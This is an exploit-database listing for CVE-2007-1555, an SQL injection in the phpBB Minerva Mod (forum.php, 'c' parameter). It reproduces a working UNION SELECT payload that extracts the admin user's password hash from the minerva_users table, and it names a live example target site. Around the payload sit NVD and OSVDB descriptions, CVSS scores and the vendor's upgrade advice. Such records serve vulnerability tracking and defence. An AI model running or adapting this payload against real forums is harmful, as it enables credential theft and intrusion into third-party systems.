Search...

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability

2007-03-19T00:00:00

ID EDB-ID:3519
Type exploitdb
Reporter Mehmet Ince
Modified 2007-03-19T00:00:00

Description

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability. CVE-2007-1555. Webapps exploit for php platform

                                        
                                            ======================X=O=R=O=N=====================
+
+ PHPBB Minerva Mod &lt;= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
+
======================X=O=R=O=N=====================
+
+ Example: http://www.ayyquerico.com/Portal/
+
======================X=O=R=O=N=====================
+
+ Special thanx: ajann
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-19]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3519", "hash": "2b4ea912770c1f56b2d86e920f5f6ac2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability", "description": "phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability. CVE-2007-1555. Webapps exploit for php platform", "published": "2007-03-19T00:00:00", "modified": "2007-03-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3519/", "reporter": "Mehmet Ince", "references": [], "cvelist": ["CVE-2007-1555"], "lastseen": "2016-01-31T18:41:02", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1555"]}, {"type": "osvdb", "idList": ["OSVDB:33748"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7465"]}], "modified": "2016-01-31T18:41:02"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3519/", "sourceData": "======================X=O=R=O=N=====================\n+\n+ PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit\n+\n======================X=O=R=O=N=====================\n+\n+ Bulan: xoron\n+\n+ xoron.biz\n+\n======================X=O=R=O=N=====================\n+\n+ SQL INJ:\n+\n+ forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*\n+\n======================X=O=R=O=N=====================\n+\n+ Example: http://www.ayyquerico.com/Portal/\n+\n======================X=O=R=O=N=====================\n+\n+ Special thanx: ajann\n+\n======================X=O=R=O=N=====================\n\n# milw0rm.com [2007-03-19]\n", "osvdbidlist": ["33748"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-10-11T11:07:03", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in forum.php in the Minerva mod 2.0.21 build 238a and earlier for phpBB allows remote attackers to execute arbitrary SQL commands via the c parameter.", "modified": "2017-10-10T21:31:53", "published": "2007-03-20T18:19:00", "id": "CVE-2007-1555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1555", "title": "CVE-2007-1555", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nMinerva contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'forum.php' script not properly sanitizing user-supplied input to the 'c' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nThe vendor has discontinued the R2 release and advised to upgrade to Minerva release R3.\n## Short Description\nMinerva contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'forum.php' script not properly sanitizing user-supplied input to the 'c' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum.php?c=[SQL]\n## References:\nVendor URL: http://www.project-minerva.org\nVendor Specific News/Changelog Entry: http://www.project-minerva.org/home/viewtopic.php?f=28&t=258\nISS X-Force ID: 33082\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3519\nFrSIRT Advisory: ADV-2007-1028\n[CVE-2007-1555](https://vulners.com/cve/CVE-2007-1555)\nBugtraq ID: 23036\n", "modified": "2007-03-19T22:30:16", "published": "2007-03-19T22:30:16", "href": "https://vulners.com/osvdb/OSVDB:33748", "id": "OSVDB:33748", "title": "Minerva forum.php c Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-25T00:00:00", "published": "2007-03-25T00:00:00", "id": "SECURITYVULNS:VULN:7465", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7465", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

phpBB Minerva Mod &lt;= 2.0.21 build 238a SQL Injection Vulnerability

Description

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability. CVE-2007-1555. Webapps exploit for php platform

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability